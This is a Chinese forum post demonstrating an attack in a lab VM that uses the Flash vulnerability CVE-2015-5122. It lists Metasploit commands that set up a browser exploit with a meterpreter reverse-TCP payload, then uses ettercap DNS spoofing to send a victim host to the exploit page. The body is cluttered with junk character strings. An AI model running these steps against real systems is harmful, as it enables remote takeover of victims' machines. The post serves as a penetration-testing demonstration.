找回密码
 立即注册
查看: 2294|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 M8 `' A$ k" ]3 O' ? 二、cve2015-5122漏洞实例演示虚拟机 * M6 K' X7 E- A& [5 }

4 ?0 ^5 R, W, G% O- v( k6 [' Y

! g, f9 m, @( u7 L! A% ]/ O   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: / G* R5 q$ g( {

/ B! |# q+ K$ F

) l H5 p+ B6 h9 Q search cve-2015-5122如图: ! q! A! Y( k6 n# i7 p

" Q' d& |0 v2 @* }. S8 r

: Q* y9 B7 f' Q; h m- y+ H   $ D# _+ n& e% ?6 U7 o1 z

9 }7 P& z2 ? w9 i4 a+ X) ?. m2 ], a" I

, I9 W; F/ c. n1 K! L1 S' M 下面我们敲如下命令: / i. Z9 i# \9 M$ T

$ H- P* X9 V4 J

" Q# i7 Z$ A0 ?8 c! \2 a3 b3 { use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 @% @1 Y0 P) H4 ~8 Q @

0 _* F( B/ E2 _: }; h

& _; A( W ?6 L3 \5 S/ p4 }+ @: k set PAYLOAD windows/meterpreter/reverse_tcp 6 d; k& r7 F4 n p( e/ M& q

! x1 k. H+ N: I9 Y# o

& i- H: R. \# z8 ?, v6 E set LHOST 192.168.0.109 ' [* K0 u, \$ {1 B

# Q4 l* s. w8 L

' ~# n, G5 ~+ m set URIPATH /                        /*根目录*/ ! g" ?+ _9 e& _2 c" p J

' H9 ?7 H; ?5 r

7 Q7 E; w1 r" I0 f2 C2 c set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 + B5 ~) s! q( a: j$ E

5 h. g3 @. x) c! R) F* W$ g' T7 r

5 Z& A$ Y+ ]$ o) `% H set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # W) i% Y! o: T$ {9 d) u

s; f/ X9 u' L4 _

& W- i' v6 a7 e3 B1 A: u6 C; g0 X5 R% P 然后show options如图: , C; n! \( N# O$ X9 E' W/ f( N" [$ K8 Q

b! e+ L7 U: c |, ?

' n" u( E) A8 ?2 {0 y6 ~- `' X   8 X. }4 c& i( K# x

) {% \/ e0 u4 q7 N" G0 T

+ h0 m) Q- `4 G5 g) s0 j 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
2 k8 ^9 I/ c; \( ]/ ~1 W+ g
; s, p& p5 t; A: {$ ^3 l' W& \: k

1 U$ @3 O$ q/ f* \& U8 X9 L) f* l

" S- k; M8 p5 I) R& @0 ] 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 6 I5 j0 s. T: A1 p

8 Y8 `# j. `7 v! _- N# x

4 M. I, l5 |6 A, ^ N Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 0 u. o: z7 g+ N7 a: S

( \* M g! D3 b% z- x3 ]

8 ^- v; v! V( c( a5 t' v6 x   1 F9 W9 m, z- |3 q. Y- y/ R! j

& ]- f, J, M: M. Y- t9 H

# J! i9 D0 b, c5 j1 _/ [ 成功了,这时候我们断开ettercap,如图: 9 ^) J& ~/ @9 n0 e

+ x. x5 M2 q8 ]" h# I8 ]4 n$ x9 x+ Z

2 m! L+ F/ s1 s2 P2 r/ K/ e   4 }0 s f* f4 _

: \+ z5 O9 Z/ j5 [% y X$ `3 \; H

% r- G X0 |; @% N! t, I Screenshot如图: 4 J2 O) l; J+ `- j/ h7 k6 O

. c* @' o) r( i6 j; b

' U. T; f6 Y6 p' R: W   ( E) F1 J% ~& R

% m( M N! j9 I6 L3 M

8 f3 \8 ?. U% n ) Z% m! J( P. I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表